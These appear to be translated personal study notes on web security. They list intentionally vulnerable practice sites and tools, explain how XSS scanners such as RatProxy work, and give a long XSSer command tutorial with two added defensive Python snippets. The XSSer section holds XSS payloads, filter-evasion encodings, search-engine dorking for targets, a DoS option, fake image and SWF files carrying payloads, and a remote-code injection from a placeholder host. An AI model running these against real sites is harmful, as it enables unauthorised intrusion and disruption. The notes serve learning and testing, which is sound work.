I'll study that broken web application later... first let me finish the work tasks.
Work task 1: find similar demo websites
http://code.google.com/p/websecurify/wiki/DemoSites
Work task 2: survey open-source automated XSS scanning tools and understand how their detection works
=================================================================
(1) Work task 1: find similar demo websites
Example site: http://code.google.com/p/websecurify/wiki/DemoSites
Details
The following websites may be used to compare Websecurify with other automated web application security testing tools:
- http://demo.testfire.net
- http://testphp.vulnweb.com
- http://testasp.vulnweb.com
- http://testaspnet.vulnweb.com
- http://zero.webappsecurity.com
- http://crackme.cenzic.com
- http://www.webscantest.com
No. | Vulnerable Application | Platform | Remark |
--- | --- | --- | --- |
1 | SPI Dynamics (live) | ASP | A scanner vendor's deliberately flawed demo site; still fine for learning. If you want to try anything new, better do it locally, unless you enjoy doing their testing for free. |
2 | Cenzic (live) | PHP | Same as 1 |
3 | Watchfire (live) | ASPX | Same as 1 |
4 | Acunetix 1 (live) | PHP | Same as 1 |
5 | Acunetix 2 (live) | ASP | Same as 1 |
6 | Acunetix 3 (live) | ASP.Net | Same as 1 |
7 | PCTechtips Challenge (live) | | Online hack challenge, just for fun |
8 | Damn Vulnerable Web Application | PHP/MySQL | A Live CD version is available, good for the lazy |
9 | Mutillidae | PHP | Purpose-built flaws mapped to the OWASP Top 10 list; highly recommended |
10 | The Butterfly Security Project | PHP | |
11 | Hacme Casino | Ruby on Rails | The Hacme series is copyright McAfee, but very old! Take it as you will and at your own risk. |
12 | Hacme Bank 2.0 | ASP.NET (2.0) | Same as above, no further comment. |
13 | Updated HackmeBank | ASP.NET (2.0) | Link dead? I haven't used it. |
14 | Hacme Books | J2EE | Hacme again... |
15 | Hacme Travel | C++ (application client-server) | Hacme again... but this one is C++, which is rare. Might be worth a look; I haven't used it. |
16 | Hacme Shipping | ColdFusion MX 7, MySQL | ColdFusion-based; worth setting up if that platform is your focus. I haven't used it. |
17 | OWASP WebGoat | JAVA | Good for teaching |
18 | OWASP Vicnum | PHP, Perl | |
19 | OWASP InsecureWebApp | JAVA | |
20 | OWASP SiteGenerator | ASP.NET | |
21 | Moth | | |
22 | Stanford SecuriBench | JAVA | |
23 | SecuriBench Micro | JAVA | |
24 | BadStore | Perl (CGI) | |
25 | WebMaven/Buggy Bank (very old) | | |
26 | EnigmaGroup (live) | | |
27 | XSS Encoding Skills x5s (Casaba Watcher) | | A Fiddler extension that assists XSS hunting (supports many character-encoding conversions) |
28 | Google Gruyere (live) (previously Jarlsberg) | | Can be played online, hosted on GAE, so if you are in China you may need a VPN or proxy to reach it. |
29 | Exploit-DB | Multi-platform | The most realistic web app vulnerability archive, totally damn real! Pick one, download the matching vulnerable version from the project's official site, and play with it locally however you like. |
30 | exploit-kb-vulnerable-web-app | PHP/MySQL | Clear documentation, easy to deploy, VMware image available, good for the lazy |
“猪在笑” recommends a few manual helper tools; personally I think they are quite good.
Tool | Category | Remark | Similar |
--- | --- | --- | --- |
paros | HTTP proxy / HTTP protocol debugging / spider | The last open-source release, 3.2.13, dates from 2006; later versions went fully commercial. Its usability and features still hold up today. Viewing, modifying and filtering HTTP traffic in both directions is its highlight. | burp proxy, Fiddler, live http headers (Firefox addon), Firebug (addon for many browsers) |
HackBar | Manual SQL injection helper | Handy for transcoding, encoding and padding with junk characters; essential for getting past filters | |
TamperData | HTTP request parameter control | Intercepts HTTP/HTTPS requests and lets you edit request parameters by hand (GET parameters, POST fields, cookies, etc.) before submitting | |
Groundspeed | Semi-automatic removal of client-side protections | Automatically detects hidden form fields, removes form validation, etc., saving you from editing the HTML through Firebug | |
BuiltWith (Chrome extension) | Automatic site stack analysis | Detects and identifies the technology stack of the site you are browsing; a script kiddie's favourite | |
Found via Google: a curated list of penetration-testing learning resources, from http://www.pulog.org/Resources/2242/Pentesting-Vulnerable/
Web Pentesting
War Games
Application Name | Company / Developer | URL |
--- | --- | --- |
Hell Bound Hackers | Hell Bound Hackers | http://hellboundhackers.org/ |
Vulnerability Assessment | Kevin Orrey | http://www.vulnerabilityassessment.co.uk/ |
Smash the Stack | Smash the Stack | http://www.smashthestack.org/ |
Over the Wire | Over the Wire | http://www.overthewire.org/wargames/ |
Hack This Site | Hack This Site | http://www.hackthissite.org/ |
Hacking Lab | Hacking Lab | https://www.hacking-lab.com/ |
We Chall | We Chall | https://www.wechall.net/ |
REMnux | REMnux | http://zeltser.com/remnux/ |
Insecure Distributions
Application Name | Company / Developer | URL |
--- | --- | --- |
Damn Vulnerable Linux | DVL | http://www.damnvulnerablelinux.org/ |
Metasploitable | Offensive Security | http://blog.metasploit.com/2010/05/introducing-metasploitable.html |
de-ICE | Hacker Junkie | http://www.de-ice.net/ |
Moth | Bonsai Security Software | http://www.bonsai-sec.com/en/research/moth.php |
PwnOS | Neil Dickson | http://www.neildickson.com/os/ |
Holynix | Pynstrom | http://pynstrom.net/holynix.php |
(2) Work task 2: how automated XSS scanners work
RatProxy can detect vulnerabilities including Cross-site Scripting (XSS), script inclusion issues, content serving problems, insufficient XSRF and XSS defenses, and so on.
- 1) When the script is run it starts a proxy server locally, on port 8080 by default;
- 2) Configure the browser to use this address (http://localhost:8080) as its proxy;
- 3) Browse the web pages to be tested, log in for real, fill in forms and so on (the proxy captures these actions, tampers with them slightly and forwards them to the page under test); ratproxy records the relevant log in the background;
- 4) Use the tool provided by ratproxy to parse the log and output HTML for analysis;
- 5) Fix the more serious issues, then go back to step 1 until the assessment passes.
$ sudo apt-get install libssl-dev openssl
$ cd ratproxy ; make
$ ./ratproxy -v . -w foo.log -d foo.com -lfscm
XSSDetect sample usage
- Launch Visual Studio
- Open a solution containing at least one C#, J# or VB.NET project
- Build the solution
- Click on Tools | XSSDetect Code Analysis, the Summary View dockable tool window activates
- Verify/edit the current settings (click on General Settings, Rules or Target Assemblies on the toolbar of the Summary View)
- Start the code analysis (use the Analyze button on the toolbar)
- After the analysis is complete, the Summary View tool window shows the results, and the output window shows information and error messages
- Double click on a result item in the Summary View to activate the Detail View
- In the Detail View, double click on a dataflow item to display the corresponding source line
- Use the "Previous" and "Next" buttons in the Detail View to display other result items
(3) Studying how XSSer works
XSSer runs on many platforms. It requires Python and the following libraries:
- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library
On Debian-based systems (e.g. Ubuntu), run:
sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip
XSSer (a powerful XSS tool): usage notes, Chinese edition
When installing Ubuntu in VMware, it comes up in command-line mode after installation; you have to reboot before the graphical desktop appears.
=======================================================================
XSSer installation and testing
1. Installation: install the required Python components
XSSer runs on many platforms. It requires Python and the following libraries:
- python-pycurl - Python bindings to libcurl
- python-beautifulsoup - error-tolerant HTML parser for Python
- python-libxml2 - Python bindings for the GNOME XML library
- python-geoip - Python bindings for the GeoIP IP-to-country resolver library
On Ubuntu, this one command installs all the Python modules needed:
- sudo apt-get install python-pycurl python-beautifulsoup python-libxml2 python-geoip
2. Download the XSSer package and install it
Download address: http://sourceforge.net/projects/xsser/files/xsser_1.6-1.tar.gz/download
After downloading, use the following commands:
Install:
- tar xzvf xsser-1.6_all.deb.tar.gz
- sudo dpkg -i xsser-1.6_all.deb
Run in GTK mode (i.e. graphical mode):
- xsser --gtk --silent
Or check out the source from SVN:
- $ svn co https://xsser.svn.sourceforge.net/svnroot/xsser xsser
3. Learning the XSSer syntax (the official site writes python xsser.py -u "http://www.baidu.com"; I used xsser -u "http://www.baidu.com"; both work)
- xsser -i url.txt --proxy "http://127.0.0.1:8118" --referer 666.666.666.666
(3) Use Cem (Character Encoding Mutations), set a User-Agent, a timeout and the number of threads
- xsser -u "http://www.baidu.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
Ps1: Cem here means: first Hex-encode the payload, then convert that to Str encoding, then Hex-encode the result again!
(first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, re-encode to hexadecimal the second encoding)
Ps2: user-agent is the User-Agent header; this field carries information such as OS version, CPU type, browser version, rendering engine, browser language and so on, all of which the web server can read. Here we don't want the web server to get that, so we simply set it to “XSSer!!!”.
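As an added illustration, not part of these notes and not XSSer's own code, the following Python shows why a server-side filter or log analyser must normalise such encoding layers before pattern-matching. It rebuilds a Hex, Str, Hex chain on the alert payload quoted later on this page (the meaning of the two layers is assumed: HTML hex character references and String.fromCharCode), then peels the layers off again until the string stops changing.

```python
import html
import re
from urllib.parse import unquote

# Constructed input: the alert payload quoted on this page.
RAW = "<script>alert('XSS')</script>"

def to_hex_refs(s):
    # "Hex" layer (assumed): every character as an &#x..; HTML character reference
    return "".join("&#x%x;" % ord(c) for c in s)

def to_fromcharcode(s):
    # "Str" layer (assumed): the text rebuilt through String.fromCharCode(...)
    return "String.fromCharCode(%s)" % ",".join(str(ord(c)) for c in s)

def mutate(s, chain=("Hex", "Str", "Hex")):
    # Apply the layers in order, mirroring the --Cem "Hex,Str,Hex" chain
    for step in chain:
        s = to_hex_refs(s) if step == "Hex" else to_fromcharcode(s)
    return s

_FCC = re.compile(r"String\.fromCharCode\(([\d,\s]*)\)")

def peel_once(s):
    # One normalisation pass: HTML character references, %XX and \xXX
    # escapes, then String.fromCharCode(...) back to the characters it builds
    s = html.unescape(s)
    s = unquote(s)
    s = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), s)
    return _FCC.sub(
        lambda m: "".join(chr(int(n)) for n in m.group(1).split(",") if n.strip()), s)

def normalize(s, max_rounds=8):
    # Repeat until the string stops changing: each mutation layer costs one
    # pass, so a single-pass decoder is still fooled by a stacked chain
    for _ in range(max_rounds):
        nxt = peel_once(s)
        if nxt == s:
            break
        s = nxt
    return s

XSS_MARKERS = re.compile(r"<\s*script|javascript:|\bon\w+\s*=", re.I)

def is_suspicious(value):
    # Match on the normalised form, never on the raw parameter value
    return bool(XSS_MARKERS.search(normalize(value)))
```

The marker pattern is only illustrative (it will also flag harmless words such as "one="); the point is that the raw mutated string matches nothing, while its normalised form does.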
(4) Read targets from a file (-i "urls.txt"), load your own code (--payload ' '), and decode it with JavaScript's unescape() function (--Une)
- xsser -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
- getURL("javascript:someFunction()")
2) The SWF file, or the web page embedding it, is placed in the local trusted sandbox
When the above conditions are met, you can use:
- --payload 'eval(getURL("javascript:alert('XSS!!!')"))'
Thought 2: why is --Une used here? unescape() decodes a string that was encoded by escape(); if the string was not encoded, it is returned unchanged. So, is the string encoded by the browser before it is sent to the web server? escape() is generally used when a script passes parameters to a URL such as a.php, but I am using XSSer; does it encode the parameters when it passes them?
I'll come back and answer these two questions once I understand them better.
(5) Specify a search engine and use its results as the target URLs: XSSer Storm
- xsser --De "duck" -d "search.php?"
Ps1: duckduckgo is a website that runs a search engine: "duck".
Ps2: -d DORK uses the search results as the target URLs (Process search engine dork results as target urls)
Ps3: --De=DORK_ENGINE specifies the engine used for dorking; there are many: (bing, altavista, yahoo, baidu, yandex, youdao, webcrawler, google, etc.)
(6) Specify the crawl depth and the number of URLs to fetch
--Cw=CRAWLER_WIDTH Deeping level of crawler: 1-5
--Cl Crawl only local target(s) urls (default TRUE)
- xsser -c 3 --Cw=4 -u "http://www.baidu.com"
(7) POST data (Simple injection from URL, using POST, with statistics results)
- xsser -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
Thought: what does -s actually do? Statistics? POST data generally means wrapping the data in a form and sending it to the web server as a request.
Answer: -s has nothing to do with POST; it just prints statistics:
===========================================================================
[*] Statistic:
===========================================================================
--------------------------------------------------
Test Time Duration: 0:00:05.929196
--------------------------------------------------
Total Connections: 2
-------------------------
200-OK: 1 | 404: 0 | 503: 0 | Others: 1
Connec: 50 %
--------------------------------------------------
Total Payloads: 1
-------------------------
Checker: 0 | Manual: 0 | Auto: 1 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
Total Injections: 1
-------------------------
Failed: 1 | Sucessfull: 0
Accur : 0 %
-------------------------
Total Discovered: 0
-------------------------
Checker: 0 | Manual: 0 | Auto: 0 | DCP: 0 | DOM: 0 | Induced: 0 | XSR: 0 | XSA: 0 | COO: 0
--------------------------------------------------
False positives: 0 | Vulnerables: 0
-------------------------
Mana: 0
--------------------------------------------------
[I] Could not find any vulnerability!. Try another combination or hack it -manually- :)
===========================================================================
(8) GET request, octal encoding (--Doo), results shown as short URLs (--short tinyurl)
- xsser -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
(9) Shadow DOM XSS attack, cross-site cookie injection, final remote code (--Fr)
- xsser -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
Ps2: how DOM XSS attacks work
Ps3: DOM shadow space (no server logging!). I think I've heard of this DOM shadow space somewhere, but I just can't find any material on it... I finally found this article via Google; it is about Shadow DOM.
What is Shadow DOM? It may help a little...
(10) DoS (denial of service) with the is.gd URL shortener
- xsser -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
Ps: According to the official description, is.gd has handled nearly 9 million URLs so far. The home page is very simple: enter the URL to shorten and submit. After generating the short URL, the system computes the string lengths before and after and shows the compression ratio.
If you want users to preview the page rather than be sent to it directly (which helps users see where the link goes and guards against phishing), just append a "-" to the short URL to enable preview mode.
For example, the Mango site http://www.mangguo.org shortens to http://is.gd/Aqdn, and the preview address is http://is.gd/Aqdn-.
Note: letters in short URLs are case-sensitive.
XSSer's output then gains this extra line:
- [/] Shortered URL (Injection): http://is.gd/eAxg3x
(11) Inject parameters into these locations: HTTP User-Agent, HTTP Referer, cookie parameters
- xsser -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
Ps1: --Xsa XSA - Cross Site Agent Scripting
Ps2: --Xsr XSR - Cross Site Referer Scripting
(12) Create a fake image with XSS code embedded (create a false image with XSS code embedded)
- xsser --imx "test.png" --payload "!enter your malicious injection code here!"
- xsser --imx "test.jpg" --payload "<script>alert('XSS')</script>"
(13) Write the positive results to a specified XML file (Report output 'positives' injections of a dorking search (using "ask" dorker) directly to an XML file).
- xsser -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
(14) Upload our scan results to certain sites (twitter). This feature is really adorable... I'll leave it at that.
- xsser -d "login.php" --De "duck" --tweet
(15) Create a .swf movie with XSS code injected (Create a .swf movie with XSS code injected)
- xsser --fla "name_of_file.swf" --payload "<script>alert('XSS!!!');</script>"
(16) Send a unique hash to pre-check whether the target URL repeats all content (send a unique hash, without vectors, to pre-check if target(s) repeats all content received)
- xsser -u "http://www.baidu.com" --hash
- Checker: looks like your target(s) does not repeat all received code.
Answer: I don't get it... I really don't. I'll dig into it once I understand more.
(17) Data Control Protocol (DCP) injection; this one feels rather obscure
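As an added sketch of the idea behind such a pre-check, not XSSer's own code and with the logic assumed: a scanner first submits a harmless unique token, with no vector in it, and checks whether, and in which HTML context, the response echoes it back, because the context (text node, attribute value or script) decides which output encoding the application should have applied. The responses below are constructed, not captured from any site.

```python
import secrets
from html.parser import HTMLParser

def make_probe():
    # Harmless unique marker: letters and hex digits only, nothing executable
    return "xsschk" + secrets.token_hex(4)

class _ReflectionFinder(HTMLParser):
    # Records every HTML context in which the token shows up in a response
    def __init__(self, token):
        super().__init__()
        self.token = token
        self.contexts = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self._in_script = True
        for name, value in attrs:
            if value and self.token in value:
                self.contexts.append("attribute:%s" % name)

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self.token in data:
            self.contexts.append("script" if self._in_script else "text")

def find_reflections(response_body, token):
    # Returns [] when the page does not repeat the token at all, otherwise
    # one entry per place it was echoed, e.g. ["attribute:value", "text"]
    parser = _ReflectionFinder(token)
    parser.feed(response_body)
    parser.close()
    return parser.contexts

# Constructed sample responses (assumed, not from a real server)
TOKEN = "xsschkdeadbeef"
ECHOING = '<input name="q" value="%s"><p>Results for %s</p>' % (TOKEN, TOKEN)
SILENT = "<p>No results</p>"
IN_SCRIPT = "<script>var q='%s';</script>" % TOKEN
```

A token echoed inside an attribute or a script block is the case worth attention for the defender, since HTML-entity encoding alone is not a sufficient fix there.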
- xsser -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
(18) Base64 encoding in the META tag (RFC 2397); also feels rather obscure
- xsser -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
- --B64 B64 - Base64 code encoding in META tag (rfc2397)
(19) Launch a browser at the end with each XSS discovered (launch a browser at the end with each XSS discovered)
- xsser -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch
- Exploiting our "own" remote code in a payload discovered using fuzzing, and launching it in a browser directly